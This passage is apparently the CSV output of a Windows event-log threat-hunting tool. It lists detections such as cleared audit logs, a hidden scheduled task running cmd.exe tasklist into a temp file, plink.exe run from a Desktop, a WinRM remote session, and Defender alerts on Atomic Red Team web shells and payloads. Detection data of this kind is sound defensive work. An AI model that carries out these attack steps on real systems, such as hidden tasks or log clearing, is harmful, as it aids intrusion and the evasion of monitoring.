&lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt;
&lt;LogonType&gt;InteractiveToken&lt;/LogonType&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;P3D&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;LocalSystem&quot;&gt;
&lt;Exec&gt;
&lt;Command&gt;cmd.exe&lt;/Command&gt;
&lt;Arguments&gt;/C tasklist &amp;gt; %windir%\Temp\CYAlyNSS.tmp 2&amp;gt;&amp;amp;1&lt;/Arguments&gt;
&lt;/Exec&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",PC01.example.corp,Security
schedule task created,1552953724.335561,2019-03-19T04:02:04.335561+04:00,,Audit,High,Audit log cleared by user ( user01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-18T11:06:25.485214Z"">
</TimeCreated>
<EventRecordID>432901</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""856"" ThreadID=""2200"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1106</SubjectUserSid>
<SubjectUserName>user01</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x18a7875</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
network share object was added,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,network share object was added,5142,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5142</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T19:30:30.324836Z"">
</TimeCreated>
<EventRecordID>6273</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""64"">
</Execution>
<Channel>Security</Channel>
<Computer>PC04.example.corp</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
<Data Name=""SubjectUserName"">IEUser</Data>
<Data Name=""SubjectDomainName"">PC04</Data>
<Data Name=""SubjectLogonId"">0x128a9</Data>
<Data Name=""ShareName"">\\*\PRINT</Data>
<Data Name=""ShareLocalPath"">c:\windows\system32</Data>
</EventData>
</Event>",PC04.example.corp,Security
Audit log cleared,1552953724.179623,2019-03-19T04:02:04.179623+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T00:02:00.383090Z"">
</TimeCreated>
<EventRecordID>566821</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""780"" ThreadID=""3480"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
<SubjectUserName>administrator</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x4fd77</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1552851030.324836,2019-03-17T23:30:30.324836+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T19:26:42.116688Z"">
</TimeCreated>
<EventRecordID>6272</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""792"" ThreadID=""3120"">
</Execution>
<Channel>Security</Channel>
<Computer>PC04.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-3583694148-1414552638-2922671848-1000</SubjectUserSid>
<SubjectUserName>IEUser</SubjectUserName>
<SubjectDomainName>PC04</SubjectDomainName>
<SubjectLogonId>0x128a9</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",PC04.example.corp,Security
Audit log cleared,1552951423.570212,2019-03-19T03:23:43.570212+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-18T23:23:37.147709Z"">
</TimeCreated>
<EventRecordID>565591</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""780"" ThreadID=""2472"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
<SubjectUserName>administrator</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x4fd77</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1547969410.645116,2019-01-20T11:30:10.645116+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-01-20T07:29:57.863893Z"">
</TimeCreated>
<EventRecordID>32950</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""736"" ThreadID=""2372"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
<SubjectUserName>Administrator</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x35312</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1547967656.784849,2019-01-20T11:00:56.784849+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-01-20T07:00:50.800225Z"">
</TimeCreated>
<EventRecordID>32853</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""736"" ThreadID=""1592"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-500</SubjectUserSid>
<SubjectUserName>Administrator</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x35312</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1600193079.987052,2020-09-15T22:04:39.987052+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-15T18:04:36.333991Z"">
</TimeCreated>
<EventRecordID>161471</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1276"" ThreadID=""6720"">
</Execution>
<Channel>Security</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-3461203602-4096304019-2269080069-1000</SubjectUserSid>
<SubjectUserName>IEUser</SubjectUserName>
<SubjectDomainName>MSEDGEWIN10</SubjectDomainName>
<SubjectLogonId>0x52a7d</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",MSEDGEWIN10,Security
Audit log cleared,1552908425.42562,2019-03-18T15:27:05.425620+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-18T11:27:00.438449Z"">
</TimeCreated>
<EventRecordID>433307</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""856"" ThreadID=""1660"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1106</SubjectUserSid>
<SubjectUserName>user01</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0x18a7875</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",PC01.example.corp,Security
Suspicious Command or process found in the log,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,Critical,Found a log contain suspicious command or process ( plink.exe),4688,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4688</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-02-13T18:03:28.318440Z"">
</TimeCreated>
<EventRecordID>227714</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""56"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
<Data Name=""SubjectUserName"">user01</Data>
<Data Name=""SubjectDomainName"">EXAMPLE</Data>
<Data Name=""SubjectLogonId"">0x2ed80</Data>
<Data Name=""NewProcessId"">0xcfc</Data>
<Data Name=""NewProcessName"">C:\Users\user01\Desktop\plink.exe</Data>
<Data Name=""TokenElevationType"">%%1936</Data>
<Data Name=""ProcessId"">0xe60</Data>
<Data Name=""CommandLine""></Data>
</EventData>
</Event>",PC01.example.corp,Security
Process running in Unusual location,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,High,"User Name : ( user01 ) with process : ( C:\Users\user01\Desktop\plink.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4688</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-02-13T18:03:28.318440Z"">
</TimeCreated>
<EventRecordID>227714</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""4"" ThreadID=""56"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
<Data Name=""SubjectUserName"">user01</Data>
<Data Name=""SubjectDomainName"">EXAMPLE</Data>
<Data Name=""SubjectLogonId"">0x2ed80</Data>
<Data Name=""NewProcessId"">0xcfc</Data>
<Data Name=""NewProcessName"">C:\Users\user01\Desktop\plink.exe</Data>
<Data Name=""TokenElevationType"">%%1936</Data>
<Data Name=""ProcessId"">0xe60</Data>
<Data Name=""CommandLine""></Data>
</EventData>
</Event>",PC01.example.corp,Security
Audit log cleared,1550080907.51234,2019-02-13T22:01:47.512340+04:00,,Audit,Critical,Audit log cleared by user ( admin01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-02-13T18:01:41.593830Z"">
</TimeCreated>
<EventRecordID>227693</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""820"" ThreadID=""608"">
</Execution>
<Channel>Security</Channel>
<Computer>PC01.example.corp</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1108</SubjectUserSid>
<SubjectUserName>admin01</SubjectUserName>
<SubjectDomainName>EXAMPLE</SubjectDomainName>
<SubjectLogonId>0xaf855</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",PC01.example.corp,Security
connection is initiated using WinRM to this machine - Powershell remoting,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User (S-1-5-21-738609754-2819869699-4189121830-500) Connected to this machine using WinRM - powershell remote - check eventlog viewer,91,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-WinRM"" Guid=""{a7975c8f-ac13-49f1-87da-5a984a4ab417}"">
</Provider>
<EventID>91</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>9</Task>
<Opcode>0</Opcode>
<Keywords>0x4000000000000004</Keywords>
<TimeCreated SystemTime=""2019-05-16T01:33:54.567896Z"">
</TimeCreated>
<EventRecordID>508</EventRecordID>
<Correlation ActivityID=""AE1A2CAB-0B85-0000-AC2F-1AAE850BD501"">
</Correlation>
<Execution ProcessID=""952"" ThreadID=""960"">
</Execution>
<Channel>Microsoft-Windows-WinRM/Operational</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security UserID=""S-1-5-21-738609754-2819869699-4189121830-500"">
</Security>
</System>
<ProcessingErrorData>
<ErrorCode>15005</ErrorCode>
<DataItemName>shellId</DataItemName>
<EventPayload>68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000</EventPayload>
</ProcessingErrorData>
</Event>",DC1.insecurebank.local,Microsoft-Windows-WinRM/Operational
Windows Defender took action against Malware,1563483223.034598,2019-07-19T00:53:43.034598+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Action ( 6 ) , Category ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:53:31.952568Z"">
</TimeCreated>
<EventRecordID>106</EventRecordID>
<Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{8791B1FB-0FE7-412E-B084-524CB5A221F3}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:13.775Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147735426</Data>
<Data Name=""Threat Name"">Trojan:XML/Exeselrun.gen!A</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:XML/Exeselrun.gen!A&amp;threatid=2147735426&amp;enterprise=0</Data>
<Data Name=""Status Code"">5</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">2</Data>
<Data Name=""Type Name"">%%823</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">6</Data>
<Data Name=""Action Name"">%%811</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x80508023</Data>
<Data Name=""Error Description"">The program could not find the malware and other potentially unwanted software on this device. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483211.952568,2019-07-19T00:53:31.952568+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Action ( 2 ) , Category ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:53:31.905406Z"">
</TimeCreated>
<EventRecordID>105</EventRecordID>
<Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:16.697Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147708292</Data>
<Data Name=""Threat Name"">HackTool:JS/Jsprat</Data>
<Data Name=""Severity ID"">4</Data>
<Data Name=""Severity Name"">High</Data>
<Data Name=""Category ID"">34</Data>
<Data Name=""Category Name"">Tool</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=HackTool:JS/Jsprat&amp;threatid=2147708292&amp;enterprise=0</Data>
<Data Name=""Status Code"">3</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068)</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">8</Data>
<Data Name=""Type Name"">%%862</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">2</Data>
<Data Name=""Action Name"">%%809</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483211.905406,2019-07-19T00:53:31.905406+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Action ( 2 ) , Category ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:53:31.902610Z"">
</TimeCreated>
<EventRecordID>104</EventRecordID>
<Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}</Data>
<Data Name=""Detection Time"">2019-07-18T20:41:40.357Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147726426</Data>
<Data Name=""Threat Name"">Trojan:Win32/Sehyioa.A!cl</Data>
<Data Name=""Severity ID"">5</Data>
